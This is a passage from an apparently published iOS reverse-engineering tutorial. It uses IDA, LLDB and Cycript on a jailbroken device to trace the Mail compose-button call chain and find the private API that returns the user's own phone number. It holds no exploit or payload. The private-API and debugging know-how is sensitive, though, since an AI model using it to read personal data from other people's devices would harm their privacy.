Figure 6- 26 The relationship of SP, value in the stack and arguments  
In most cases, the number of arguments on stack will not exceed 10, so “x/10 $sp ” is 
enough. Print them in order, we can get all arguments on stack.  
With the combination of IDA and LLDB, we have figured out that the core in 
[UIBarButtonItem _sendAction:withEvent:] is [MailAppController 
sendAction:@selector(composeButtonClicked:) to:nil from:ComposeButtonItem 
forEvent:UITouchesEvent], which is one step closer to our target function of “composing 
email” . Next let ’s figure out what does [UIApplication sendAction:to:from:forEvent:] do with 
IDA, as shown in figure 6 -27:  

 
218   
Figure 6-  27 [UIApplication sendAction:to:from:forEvent:]  
Whatever, “performSelector:withObject:withObject: ” in loc_24ebbc10 will get executed, so 
naturally we can guess it is where actual operations are performed. Just like before, let ’s figure 
out what does this method do with LLDB. The ASLR offset of UIKit is 0x6db3000, and the 
address of the last objc_msgSend is 0x24EBBC26, so we set a breakpoint at 0x6db3000 + 
0x24EBBC26 = 0x2BC6EC26, then tap “compose ” button to trigger the breakpoint to inspect 
the arguments:  
(lldb) br s -a 0x2BC6EC26  
Breakpoint 1: where = UIKit` -[UIApplication sendAc tion:to:from:forEvent:] + 66, address 
= 0x2bc6ec26  
Process 226191 stopped  
* thread #1: tid = 0x3738f, 0x2bc6ec26 UIKit` -[UIApplication 
sendAction:to:from:forEvent:] + 66, queue = ‘com.apple.main -thread, stop reason = 
breakpoint 1.1  
    frame #0: 0x2bc6ec26  UIKit`-[UIApplication sendAction:to:from:forEvent:] + 66  
UIKit`-[UIApplication sendAction:to:from:forEvent:] + 66:  
-> 0x2bc6ec26:  blx    0x2c3539f8                ; symbol stub for: roundf$shim  
   0x2bc6ec2a:  cmp    r6, #0  
   0x2bc6ec2c:  it     ne  
   0x2bc6ec2e:  movne  r6, #1  
(lldb) p (char *)$r1  
(char *) $0 = 0x2c3dac95 "performSelector:withObject:withObject:"  
(lldb) po $r0  
<ComposeButtonItem: 0x14ddf5f0>  
(lldb) p (char *)$r2  
(char *) $2 = 0x2c4140f2 "_sendAction:withEvent:"  
(lldb) po $r3  
<UIToolbarButton: 0x14d73c90; frame = (285 0; 23 44); opaque = NO; gestureRecognizers = 
<NSArray: 0x14d22ec0>; layer = <CALayer: 0x14d73ea0>>  
(lldb) x/10 $sp  

 
219 0x003735a8: 0x160a6120 0x00000001 0x14d73c90 0x160a6120  
0x003735b8: 0x2c3d9be5 0x003735d4 0x2bc6ebd 1 0x14d73c90  
0x003735c8: 0x160a6120 0x00000040  
(lldb) po 0x160a6120  
<UITouchesEvent: 0x160a6120> timestamp: 73509.2 touches: {(  
    <UITouch: 0x14ff2f20> phase: Ended tap count: 1 window: <UIWindow: 0x14d878b0; frame 
= (0 0; 320 568); autoresize = W+H; ges tureRecognizers = <NSArray: 0x14dba890>; layer = 
<UIWindowLayer: 0x14d87a30>> view: <UIToolbarButton: 0x14d73c90; frame = (285 0; 23 44); 
opaque = NO; gestureRecognizers = <NSArray: 0x14d22ec0>; layer = <CALayer: 0x14d73ea0>> 
location in window: {308, 545}  previous location in window: {308, 545} location in view: 
{23, 21} previous location in view: {23, 21}  
)} 
What the hell? performSelector:withObject:withObject: called [ComposeButtonItem 
_sendAction:withEvent:], and [ComposeButtonItem _sendAction:withEven t:] called 
performSelector:withObject:withObject: in turn. If performSelector:withObject:withObject: 
calls [ComposeButtonItem _sendAction:withEvent:] again then we ’ll fall into an infinite call 
loop and the UI will be locked endlessly, which doesn ’t make sense and conflicts with what 
we’ve seen. Let ’s continue the process to trigger the breakpoint again and see what happens:  
(lldb) c  
Process 226191 resuming  
Process 226191 stopped  
* thread #1: tid = 0x3738f, 0x2bc6ec26 UIKit` -[UIApplication 
sendAction:to:fro m:forEvent:] + 66, queue = ‘com.apple.main -thread, stop reason = 
breakpoint 1.1  
    frame #0: 0x2bc6ec26 UIKit` -[UIApplication sendAction:to:from:forEvent:] + 66  
UIKit`-[UIApplication sendAction:to:from:forEvent:] + 66:  
-> 0x2bc6ec26:  blx    0x2c3539f8                ; symbol stub for: roundf$shim  
   0x2bc6ec2a:  cmp    r6, #0  
   0x2bc6ec2c:  it     ne  
   0x2bc6ec2e:  movne  r6, #1  
(lldb) p (char *)$r1  
(char *) $6 = 0x2c3dac95 "performSelector:withObject:withObject:"  
(lldb) po $r0  
<MailAppController: 0x14e 7a7a0> 
(lldb) p (char *)$r2  
(char *) $7 = 0x2d763308 "composeButtonClicked:"  
(lldb) po $r3  
<ComposeButtonItem: 0x14ddf5f0>  
(lldb) x/10 $sp  
0x0037356c: 0x160a6120 0x160a6120 0x2d763308 0x14e7a7a0  
0x0037357c: 0x14ddf5f0 0x003735a0 0x2bdd26fd 0x14ddf5f0  
0x0037358c: 0x160a6120 0x160fbdf0  
(lldb) po 0x160a6120  
<UITouchesEvent: 0x160a6120> timestamp: 73509.2 touches: {(  
    <UITouch: 0x14ff2f20> phase: Ended tap count: 1 window: <UIWindow: 0x14d878b0; frame 
= (0 0; 320 568); autoresize = W+H; gestureRecognize rs = <NSArray: 0x14dba890>; layer = 
<UIWindowLayer: 0x14d87a30>> view: <UIToolbarButton: 0x14d73c90; frame = (285 0; 23 44); 
opaque = NO; gestureRecognizers = <NSArray: 0x14d22ec0>; layer = <CALayer: 0x14d73ea0>> 
location in window: {308, 545} previous loc ation in window: {308, 545} location in view: 
{23, 21} previous location in view: {23, 21}  
)} 
 
220 As we can see, arguments of performSelector:withObject:withObject: have changed, and 
[MailAppController composeButtonClicked:ComposeButtonItem] was called. If we “c” again, 
the breakpoint will not be triggered, so we can confirm it ’s composeButtonClicked: that 
performs the actual operation. Because inside MobileMail, we can get an MailAppController 
object from [UIApplication sharedApplication], and at the beginning of this section, we ’ve seen a 
class method +composeButtonItem in ComposeButtonItem.h, which r eturns a 
ComposeButtonItem object, now we ’re able to get all necessary objects to call 
[MailAppController composeButtonClicked:ComposeButtonItem]; what ’s more, we can call it 
anywhere inside MobileMail. Therefore, composeButtonClicked: can be regarded as t he target 
function of “compose email ”. 
Finally, let ’s test this method in Cycript to see if it works:  
FunMaker -5:~ root# cycript -p MobileMail  
cy# [UIApp composeButtonClicked:[ComposeButtonItem composeButtonItem]]  
After the above commands, the “New Message ” view shows in Mail. In this example, we ’ve 
tracked the call chain with IDA until the target function was located, and then we ’ve analyzed 
its arguments with LLDB. I call it a complex process rather than a difficult one, do you agree? In 
the next section , we will find out the target function of “my number ” with the similar pattern, 
please try to sum up the experiences.  
2.   Look for the target function of “my number” 
Let’s continue our analysis from the UI function [PhoneSettingsController 
tableView:cellForRowAtIndexPath:]. Because the return value of UI function is stored in R0, and according to “MOV R0, R4 ” in figure 6- 17, we know R0 comes from R4. As shown in figure 
6-28, R4 is only assigned once at “MOV R4, R0 ” and R0 comes from the return value of 
objc_msgSendSuper2. objc_msgSendSuper2 is undocumented, as we can see in figure 6 -29, it 
comes from “/usr/lib/libobjc.A.dylib ”. 
 
221   
Figure 6- 28 Source of R4  
  
Figure 6- 29 Sourc e of objc_msgSendSuper2  
According to the literal meaning, objc_msgSendSuper2 and objc_msgSendSuper are 
supposed to work similarly, namely send messages to callers ’ superclasses. No more guesses, 
let’s set a breakpoint on objc_msgSendSuper2 and check out it s arguments as well return value. 
Attach debugserver to Preference, and connect with LLDB, then print out ASLR offset of 
MobilePhoneSettings:  
(lldb) image list - o -f 
[  0] 0x00079000 
/private/var/db/stash/_.29LMeZ/Applications/Preferences.app/Preferences(0 x000000000007d0
00) 
[  1] 0x00232000 /Library/MobileSubstrate/MobileSubstrate.dylib(0x0000000000232000)  
[  2] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/System/Library/PrivateFrameworks/BulletinBoard.framewor k/BulletinBoard  
[  3] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation  
...... 
[330] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupp ort/8.1 
(12B411)/Symbols/System/Library/PreferenceBundles/MobilePhoneSettings.bundle/MobilePhone
Settings  
...... 

 
222 ASLR offset of MobilePhoneSettings is 0x6db3000. Then take a look at 
objc_msgSendSuper2 ’s address, as shown in figure 6 -30. 
  
Figure 6- 30 Check out  address of objc_msgSendSuper2  
The breakpoint should be set at 0x6db3000 + 0x25BB2B68 = 0x2C965B68. Re -enter 
MobilePhoneSettings to trigger the breakpoint:  
(lldb) br s -a 0x2C965B68  
Breakpoint 1: where = MobilePhoneSettings` -[PhoneSettingsController 
tableView:cellForRowAtIndexPath:] + 40, address = 0x2c965b68  
Process 268587 stopped  
* thread #1: tid = 0x4192b, 0x2c965b68 MobilePhoneSettings` -[PhoneSettingsController 
tableView:cellForRowAtIndexPath:] + 40, queue = ‘com.apple.main -thread, stop reason = 
breakpoint 1.1 
    frame #0: 0x2c965b68 MobilePhoneSettings` -[PhoneSettingsController 
tableView:cellForRowAtIndexPath:] + 40  
MobilePhoneSettings` -[PhoneSettingsController tableView:cellForRowAtIndexPath:] + 40:  
-> 0x2c965b68:  blx    0x2c975fb8                ; s ymbol stub for: 
CTSettingRequest$shim  
   0x2c965b6c:  mov    r4, r0  
   0x2c965b6e:  movw   r0, #54708  
   0x2c965b72:  movt   r0, #2697  
(lldb) p (char *)$r1  
(char *) $0 = 0x2c3daf33 "tableView:cellForRowAtIndexPath:"  
(lldb) po $r0  
[no Objective -C descriptio n available]  
(lldb) ni  
Process 268587 stopped  
* thread #1: tid = 0x4192b, 0x2c965b6c MobilePhoneSettings` -[PhoneSettingsController 
tableView:cellForRowAtIndexPath:] + 44, queue = ‘com.apple.main -thread, stop reason = 
instruction step over  
    frame #0: 0x2c965b6c MobilePhoneSettings` -[PhoneSettingsController 
tableView:cellForRowAtIndexPath:] + 44  
MobilePhoneSettings` -[PhoneSettingsController tableView:cellForRowAtIndexPath:] + 44:  
-> 0x2c965b6c:  mov    r4, r0  
   0x2c965b6e:  movw   r0, #54 708 
   0x2c965b72:  movt   r0, #2697  
   0x2c965b76:  mov    r2, r5  
(lldb) po $r0  
<PSTableCell: 0x15fc6b00; baseClass = UITableViewCell; frame = (0 0; 320 44); text = ‘My 
Number’; tag = 2; layer = <CALayer: 0x15fbbe40>>  

 
223 (lldb) po [$r0 detailTextLabel]  
<UITableViewLabel: 0x15fb5590; frame = (0 0; 0 0); text = ‘+86PhoneNumber’; 
userInteractionEnabled = NO; layer = <_UILabelLayer: 0x15fd87e0>>  
It’s worth mentioning that the 1st argument of objc_msgSendSuper2 is not an Objective -C 
object. I ’m not sure whether it is a bug of LLDB or it is the actual case. Anyway, it doesn ’t 
influence our analysis, just ignore it for now. If you ’re really interested in this detail, you are 
welcome to share your research on http://bbs.iosre.com.  
Back on track, the output of LLDB indicates that the return value of objc_msgSendSuper2 is 
an initialized cell, which contains my number already. Similar to what happened in the last 
section, let ’s check out the implementation of table View:cellForRowAtIndexPath: in 
PhoneSettingsController ’s superclass. First of all let ’s figure out who ’s the superclass in 
PhoneSettingsController.h:  
@interface PhoneSettingsController : PhoneSettingsListController 
<TPSetPINViewControllerDelegate> 
...... 
@end 
PhoneSettingsController inherits from PhoneSettingsListController, so open 
PhoneSettingsListController.h to check out if it implements 
tableView:cellForRowAtIndexPath:. 
@interface PhoneSettingsListController : PSListController  
{ 
} 
 
- (id)bundle;  
- (void)dealloc; 
- (id)init;  
- (void)pushController:(Class)arg1 specifier:(id)arg2;  
- (id)setCellEnabled:(BOOL)arg1 atIndex:(unsigned int)arg2;  
- (id)setCellLoading:(BOOL)arg1 atIndex:(unsigned int)arg2;  
- (id)setControlEnabled:(BOOL)arg1 atIndex:(unsigned int)arg2 ; 
- (id)sheetSpecifierWithTitle:(id)arg1 controller:(Class)arg2 detail:(Class)arg3;  
- (void)simRemoved:(id)arg1;  
- (id)specifiers;  
- (void)updateCellStates;  
- (void)viewWillAppear:(BOOL)arg1;  
 
@end 
PhoneSettingsListController doesn’ t implement tableView:cellForRowAtIndexPath:, so just 
proceed to its superclass PSListController. The class PSListController is no longer inside 
MobilePhoneSettings.bundle, so let ’s search it in all class -dump headers, as shown in figure 6 -31. 
 
224   
Figure 6- 31 Locate PSL istController.h  
Note, PSListController.h comes from Preferences.framework, which shares the name with 
Preferences.app, make sure to distinguish them. Open it, and check if there is 
tableView:cellForRowAtIndexPath:. 
@interface PSListController : PSViewController <UITableViewDelegate, 
UITableViewDataSource, UIActionSheetDelegate, UIAlertViewDelegate, 
UIPopoverControllerDelegate, PSSpecifierObserver, PSViewControllerOffsetProtocol>  
...... 
- (id)tableView:(id)arg1 cellForRowAtIndexPath:(id)arg2;  
...... 
@end 
As we see, it has implemented this method, so drag and drop the binary of 
Preferences.framework into IDA and jump to tableView:cellForRowAtIndexPath:, as shown in 
figure 6 -32. 

 
225   
Figure 6- 32 [PSListController tableView:cellForRowAtIndexPath:]  
Its execution logic is c omplicated. To play it safe, let ’s set a breakpoint at the end of this 
method to check if “my number ” is contained in the return value, so that we can make sure 
objc_msgSendSuper2 calls [PSListController tableView:cellForRowAtIndexPath:]. First, let ’s 
check out ASLR offset of Preferences.framework:  
(lldb) image list -o -f 
[  0] 0x00079000 
/private/var/db/stash/_.29LMeZ/Applications/Preferences.app/Preferences(0x000000000007d0
00) 
[  1] 0x00232000 /Library/MobileSubstrate/MobileSubstrate.dylib(0x000000000 0232000)  
[  2] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/System/Library/PrivateFrameworks/BulletinBoard.framework/BulletinBoard  
[  3] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8 .1 
(12B411)/Symbols/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation  
...... 
[ 42] 0x06db3000 /Users/snakeninny/Library/Developer/Xcode/iOS DeviceSupport/8.1 
(12B411)/Symbols/System/Library/PrivateFrameworks/Preferences.framework/Preferences  
...... 
Its ASLR offset is 0x6db3000. Then find the address of the last instruction of 
[PSListController tableView:cellForRowAtIndexPath:], as shown in figure 6 -33. 

 
226   
Figure 6- 33 [PSListController tableView:cellForRowAtIndexPath:]  
Because the return value is s tored in R0 and R0 comes from “MOV R0, R6 ”, we can simply 
set a breakpoint on this instruction and print out R6. The address of this instruction is 
0x2A9F79E6, so set the breakpoint at 0x6db3000 + 0x2A9F79E6 = 0x317AA9E6. Re -enter 
MobilePhoneSettings to tr igger the breakpoint:  
(lldb) br s -a 0x317AA9E6  
Breakpoint 5: where = Preferences` -[PSListController tableView:cellForRowAtIndexPath:] + 
1026, address = 0x317aa9e6  
Process 268587 stopped  
* thread #1: tid = 0x4192b, 0x317aa9e6 Preferences` -[PSListControlle r 
tableView:cellForRowAtIndexPath:] + 1026, queue = ‘com.apple.main -thread, stop reason = 
breakpoint 5.1  
    frame #0: 0x317aa9e6 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 1026  
Preferences` -[PSListController tableView:cellForRowAtI ndexPath:] + 1026:  
-> 0x317aa9e6:  mov    r0, r6  
   0x317aa9e8:  add    sp, #28  
   0x317aa9ea:  pop.w  {r8, r10, r11}  
   0x317aa9ee:  pop    {r4, r5, r6, r7, pc}  
(lldb) po $r6  
<PSTableCell: 0x15f8c6a0; baseClass = UITableViewCell; frame = (0 0; 320 44); text = ‘My 
Number’; tag = 2; layer = <CALayer: 0x15f7c0b0>>  
(lldb) po [$r6 detailTextLabel]  
<UITableViewLabel: 0x15f7b8d0; frame = (0 0; 0 0); text = ‘+86PhoneNumber’; 
userInteractionEnabled = NO; layer = <_UILabelLayer: 0x15f7b990>>  
Now we can confirm th at objc_msgSendSuper2 calls [PSListController 
tableView:cellForRowAtIndexPath:], and its return value does come from R6. Well, where does 
R6 come from? When we track back to look for the source of R6, we can see multiple 
occurrences of R6 as the 1st argume nt of multiple objc_msgSend, as shown in figure 6 -34. 

 
227   
Figure 6- 34 Multiple occurrences of R6  
Keep looking upwards, you will find that R6 are assigned with various initialized objects, as 
shown in figure 6 -35, figure 6 -36, and figure 6 -37. 

 
228   
Figure 6- 35 The assignment of R6  
  
Figure 6- 36 The assignment of R6  
  
Figure 6- 37 The assignment of R6  
This makes sense; the functionality of tableView:cellForRowAtIndexPath: is basically 
returning an available cell. So, its regular implementation is to create an empt y cell at first, then 
configure it with other methods. Well, where does the configuration of “my number ” happen?  
Regardless of efficiency, we can investigate from the beginning of [PSListController 
tableView:cellForRowAtIndexPath:]. Since there’ s a limite d number of objc_msgSends, by 
printing out [$r6 detailTextLabel] before and after each objc_msgSend and comparing the 
differences, we can definitely locate this configuration objc_msgSend; if you ’re good at math, 
dichotomy can be used in this scenario, you  can inspect from the middle. Anyway, it ’s just a 
matter of personal preferences. In this example, I use a compromised dichotomy, as shown in 
figure 6 -38. 

 
229   
Figure 6- 38 [PSListController tableView:cellForRowAtIndexPath:]  
Dichotomy increases the efficiency of our investigation, but it brings a new question: 
[PSListController tableView:cellForRowAtIndexPath:] branches a lot, where should we choose 
as the investigation starting point to avoid missing any branches? Because [PS ListController 
tableView:cellForRowAtIndexPath:] will definitely execute code in the red block in figure 6 -38, 
if we start from this block, we can make sure every branch is investigated. Next let ’s investigate 
the 1st objc_msgSend in this block, if [$r6 de tailTextLabel] contains my number, then we should 
investigate upwards, otherwise we should investigate downwards. Take a look at the assembly 
in the red  block, as shown in figure 6- 39. 
  
Figure 6- 39 loc_2a9f7966  
There are 2 objc_msgSends, so we start from the top one, as shown in figure 6 -40. 

 
230   
Figure 6- 40 Check out address of objc_msgSend  
ASLR offset of Preferences is 0x6db3000 as we have just seen it. So the breakpoint should be 
set at 0x6db3000 + 0x2A9F797E = 0x317AA97E. Trigger it and see if PSTableCell  contains my 
number already:  
(lldb) br s - a 0x317AA97E 
Breakpoint 10: where = Preferences`- [PSListController tableView:cellForRowAtIndexPath:] 
+ 922, address = 0x317aa97e  
Process 268587 stopped  
* thread #1: tid = 0x4192b, 0x317aa97e Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 922, queue = ‘com.apple.main -thread, stop reason = 
breakpoint 10.1  
    frame #0: 0x317aa97e Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 922  
Preferences` -[PSListController tableView:cellForRowAtIndexPath:] + 922:  
-> 0x317aa97e:  blx    0x31825f04                ; symbol stub for: 
____NETRBClientResponseHandler_block_invoke  
   0x317aa982:  mov    r2, r0  
   0x317aa984:  movw   r0, #59804  
   0x317aa988:  movt   r0, #1736  
(lldb) po [$r6 detailTextLabel]  
<UITableViewLabel: 0x15f7e490; frame = (0 0; 0 0); userInteractionEnabled = NO; layer = 
<_UILabelLayer: 0x15fd1c90>>  
The cell doesn ’t hold my number yet, which indicates that my number is generated after the 
red block, i.e. somewhere in the last 3 blocks of code in figure 6 -38. Based on this conclusion, 
let’s keep executing “ ni” command, then “po [$r6 detailTextLabel]”  before and after each 
objc_msgSend:  
(lldb) ni 
Process 268587 stopped 
* thread #1: tid = 0x4192b, 0x317aa982 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 926, queue = ‘com.apple.main -thread, stop reason = 
instruction step over  
    frame #0: 0x317aa982 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 926 
Preferences` -[PSListController tableView:cellForRowAtIndexPath:] + 926:  
-> 0x317aa982:  mov    r2, r0  
   0x317aa984:  movw   r0, #59804  
   0x317aa988:  movt   r0, #1736  
   0x317aa98c:  add    r0, pc  
(lldb) po [$r6 detailTextLabel]  

 
231 <UITableViewLabel: 0x15f7e490; frame = (0 0; 0 0); userInteractionEnabled = NO; layer = 
<_UILabelLayer: 0x15fd1c90>>  
(lldb) ni  
...... 
Process 268587 stopped  
* thread #1: tid = 0x4192b, 0x317aa992 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 942, queue = ‘co m.apple.main -thread, stop reason = 
instruction step over  
    frame #0: 0x317aa992 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 942  
Preferences` -[PSListController tableView:cellForRowAtIndexPath:] + 942:  
-> 0x317aa992:  blx    0x31825f 04                ; symbol stub for: 
____NETRBClientResponseHandler_block_invoke  
   0x317aa996:  tst.w  r0, #255  
   0x317aa99a:  beq    0x317aa9e6                ; -[PSListController 
tableView:cellForRowAtIndexPath:] + 1026  
   0x317aa99c:  movw   r0, #6030 2 
(lldb) po [$r6 detailTextLabel]  
<UITableViewLabel: 0x15f7e490; frame = (0 0; 0 0); userInteractionEnabled = NO; layer = 
<_UILabelLayer: 0x15fd1c90>>  
(lldb) ni  
Process 268587 stopped  
* thread #1: tid = 0x4192b, 0x317aa996 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 946, queue = ‘com.apple.main -thread, stop reason = 
instruction step over  
    frame #0: 0x317aa996 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 946  
Preferences` -[PSListController tableView:cellForRowAt IndexPath:] + 946:  
-> 0x317aa996:  tst.w  r0, #255  
   0x317aa99a:  beq    0x317aa9e6                ; -[PSListController 
tableView:cellForRowAtIndexPath:] + 1026  
   0x317aa99c:  movw   r0, #60302  
   0x317aa9a0:  mov    r2, r11  
(lldb) po [$r6 detailTextLabel]  
<UITableViewLabel: 0x15f7e490; frame = (0 0; 0 0); userInteractionEnabled = NO; layer = 
<_UILabelLayer: 0x15fd1c90>>  
(lldb) ni  
...... 
Process 268587 stopped  
* thread #1: tid = 0x4192b, 0x317aa9ac Preferences` -[PSListController 
tableView:cellFo rRowAtIndexPath:] + 968, queue = ‘com.apple.main -thread, stop reason = 
instruction step over  
    frame #0: 0x317aa9ac Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 968  
Preferences` -[PSListController tableView:cellForRowAtIndexPath:] + 968: 
-> 0x317aa9ac:  blx    0x31825f04                ; symbol stub for: 
____NETRBClientResponseHandler_block_invoke  
   0x317aa9b0:  movw   r0, #60822  
   0x317aa9b4:  mov    r2, r11  
   0x317aa9b6:  movt   r0, #1736  
(lldb) po [$r6 detailTextLabel]  
<UITableV iewLabel: 0x15f7e490; frame = (0 0; 0 0); userInteractionEnabled = NO; layer = 
<_UILabelLayer: 0x15fd1c90>>  
(lldb) ni  
Process 268587 stopped  
* thread #1: tid = 0x4192b, 0x317aa9b0 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 972, queu e = ‘com.apple.main -thread, stop reason = 
instruction step over  
    frame #0: 0x317aa9b0 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 972  
 
232 Preferences` -[PSListController tableView:cellForRowAtIndexPath:] + 972:  
-> 0x317aa9b0:  movw   r 0, #60822  
   0x317aa9b4:  mov    r2, r11  
   0x317aa9b6:  movt   r0, #1736  
   0x317aa9ba:  add    r0, pc  
(lldb) po [$r6 detailTextLabel]  
<UITableViewLabel: 0x15f7e490; frame = (0 0; 0 0); userInteractionEnabled = NO; layer = 
<_UILabelLayer: 0x15fd1c90>>  
(lldb) ni  
...... 
Process 268587 stopped  
* thread #1: tid = 0x4192b, 0x317aa9c0 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 988, queue = ‘com.apple.main -thread, stop reason = 
instruction step over  
    frame #0: 0x317aa9c0 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 988  
Preferences` -[PSListController tableView:cellForRowAtIndexPath:] + 988:  
-> 0x317aa9c0:  blx    0x31825f04                ; symbol stub for: 
____NETRBClientResponseHandler_block_invoke  
   0x317aa9c4:  m ovw   r0, #4312  
   0x317aa9c8:  movt   r0, #1737  
   0x317aa9cc:  add    r0, pc  
(lldb) po [$r6 detailTextLabel]  
<UITableViewLabel: 0x15f7e490; frame = (0 0; 0 0); userInteractionEnabled = NO; layer = 
<_UILabelLayer: 0x15fd1c90>>  
(lldb) ni  
Process 268587 sto pped 
* thread #1: tid = 0x4192b, 0x317aa9c4 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 992, queue = ‘com.apple.main -thread, stop reason = 
instruction step over  
    frame #0: 0x317aa9c4 Preferences` -[PSListController 
tableView:cellFo rRowAtIndexPath:] + 992  
Preferences` -[PSListController tableView:cellForRowAtIndexPath:] + 992:  
-> 0x317aa9c4:  movw   r0, #4312  
   0x317aa9c8:  movt   r0, #1737  
   0x317aa9cc:  add    r0, pc  
   0x317aa9ce:  ldr    r0, [r0]  
(lldb) po [$r6 detailTextLabel]  
<UITableViewLabel: 0x15f7e490; frame = (0 0; 0 0); text = ‘+86PhoneNumber’; 
userInteractionEnabled = NO; layer = <_UILabelLayer: 0x15fd1c90>>  
Obviously, my number appears after objc_msgSend at 0x317aa9c0. Because 0x317aa9c0 - 
0x6db3000 = 0x2A9F79C0, we can locate this address in IDA, as shown in figure 6 -41. 
  
Figure 6- 41 The configuration objc_msgSend  
As it name suggests, this method refreshes the cell contents with something specific. Let ’s 
uncover this “ something specific ”: set a breakpoint at this objc_msgSend, then trigger it and 
print its argument: 
(lldb) br s - a 0x317AA9C0 
Breakpoint 11: where = Preferences`- [PSListController tableView:cellForRowAtIndexPath:] 
+ 988, address = 0x317aa9c0  
Process 268587 stopped  

 
233 * thread #1: tid = 0x4192b, 0x317aa9c 0 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 988, queue = ‘com.apple.main -thread, stop reason = 
breakpoint 11.1  
    frame #0: 0x317aa9c0 Preferences` -[PSListController 
tableView:cellForRowAtIndexPath:] + 988  
Preferences` -[PSListCont roller tableView:cellForRowAtIndexPath:] + 988:  
-> 0x317aa9c0:  blx    0x31825f04                ; symbol stub for: 
____NETRBClientResponseHandler_block_invoke  
   0x317aa9c4:  movw   r0, #4312  
   0x317aa9c8:  movt   r0, #1737  
   0x317aa9cc:  add    r0, pc  
(lldb) p (char *)$r1  
(char *) $97 = 0x318362d2 "refreshCellContentsWithSpecifier:"  
(lldb) po $r2  
My Number   ID:myNumberCell 0x170ece60   target:<PhoneSettingsController 
0x170ed760: navItem <UINavigationItem: 0x170d0b40>, view <UITableView: 0x16acb200; frame  
= (0 0; 320 568); autoresize = W+H; gestureRecognizers = <NSArray: 0x15d232d0>; layer = 
<CALayer: 0x15fc9110>; contentOffset: {0, -64}; contentSize: {320, 717.5}>>  
(lldb) po [$r2 class]  
PSSpecifier  
As the output shows, “something specific ”, i.e. specifier, is a PSSpecifier object, and it ’s 
tightly related to my number. If you have carefully read the preferences specifier plist standard 
in section PreferenceBundle of the last chapter, you would know that the contents of a 
PSTableCell are specified by a PSS pecfier. Further more, we can acquire the setter and getter of 
PSSpecifier through [PSSpecifier propertyForKey:@“ set”] and [PSSpecifier 
propertyForKey:@ “get”] like this:  
(lldb) po [$r2 propertyForKey:@"set"]  
setMyNumber:specifier:  
(lldb) po [$r2 propertyFo rKey:@"get"]  
myNumber:  
We can also get their target through [PSSpecifier target]:  
(lldb) po [$r2 target] 
<PhoneSettingsController 0x170ed760: navItem <UINavigationItem: 0x170d0b40>, view 
<UITableView: 0x16acb200; frame = (0 0; 320 568); autoresize = W+H; gestureRecognizers = 
<NSArray: 0x15d232d0>; layer = <CALayer: 0x15fc9110>; contentOffset: {0, -64}; 
contentSize: {320, 717.5}>>  
Excellent! Now we know my number on PSTableCell is set through 
[PhoneSettingsController setMyNumber:specifier:], and is got through 
[PhoneSettingsController myNumber:] (Do you still remember these 2 methods?), so there 
must be a method inside myNumber: that returns my number, as shown in figure 6 -42. 
 
234   
Figure 6- 42 [PhoneSettingsController myNumber:]  
The implementation of [Phone SettingsController myNumber:] is rather straightforward. 
This method simply checks whether the length of [[PhoneSettingsTelephony telephony] 
myNumber] is 0. If it is not 0, it is returned as my number, otherwise this method returns an 
“unknown number ” as an error reminder. Let ’s test [[PhoneSettingsTelephony telephony] 
myNumber] with Cycript:  
FunMaker- 5:~ root# cycript - p Preferences 
cy# [[PhoneSettingsTelephony telephony] myNumber]  
@"+86PhoneNumber"  
Now, press home button to quit Preferences, then termina te it completely and make sure 
it’s not running in the background. After that, launch it again and don ’t enter 
MobilePhoneSettings for now, let ’s test this method again:  
FunMaker -5:~ root# cycript -p Preferences  
cy# [[PhoneSettingsTelephony telephony] myNumber]  
ReferenceError: Can’t find variable: PhoneSettingsTelephony  
An error happens. What ’s wrong? The reason is that PhoneSettingsTelephony is a class of 
MobilePhoneSettings.bundle. If we don ’t enter MobilePhoneSettings, this bundle will not be 
loaded, so this class doesn ’t exist. In other words, this method will only work after 
MobilePhoneSettings.bundle is loaded. The way Preference.app loads 
MobilePhoneSettings.bundle is called lazy load, which is common in iOS reverse engineering. 
When you come acr oss it, welcome to discuss with us on http://bbs.iosre.com . 
So far, we can say we have already found the target function, because we have got both the 
caller and arguments of this method, plus no UI operation is involve d, we can call this method 
neatly. However, there is still a fly in the ointment: MobilePhoneSettings.bundle must be 

 
235 loaded, which weakens elegancy. Is there any way that enables us to get rid of this burden? I 
think so. Because ultimately, my number is st ored on SIM card, the original data source of 
[PhoneSettingsTelephony myNumber] should come from SIM card. Whereas, SIM card 
accessibility is obviously not limited to MobilePhoneSettings.bundle, there must be a more 
common as well lower level library that can read SIM card. If we can locate this library, we can 
get my number without loading MobilePhoneSettings.bundle. Since it ’s supposed to be a lower 
level library, naturally, we should dig into [PhoneSettingsTelephony myNumber] to find out 
how it reads my number, as shown in figure 6 -43. 
  
Figure 6- 43 [PhoneSettingsTelephony myNumber]  
This method is also very simple. It judges if the instance variable _myNumber is nil; if not, 
branches left and records “My Number requested, returning cached value: %@ ”, namely, 
returns a data in cache; or else branches right, first get my number by calling PhoneSettingsCopyMyNumber, then records “My Number requested, no cached value, fetched: 
%@” , namely, my number is not in cache, so it returns a newly fetched data. In conse quence, 
PhoneSettingsCopyMyNumber is able to get my number, but as its name suggests, it is still a 
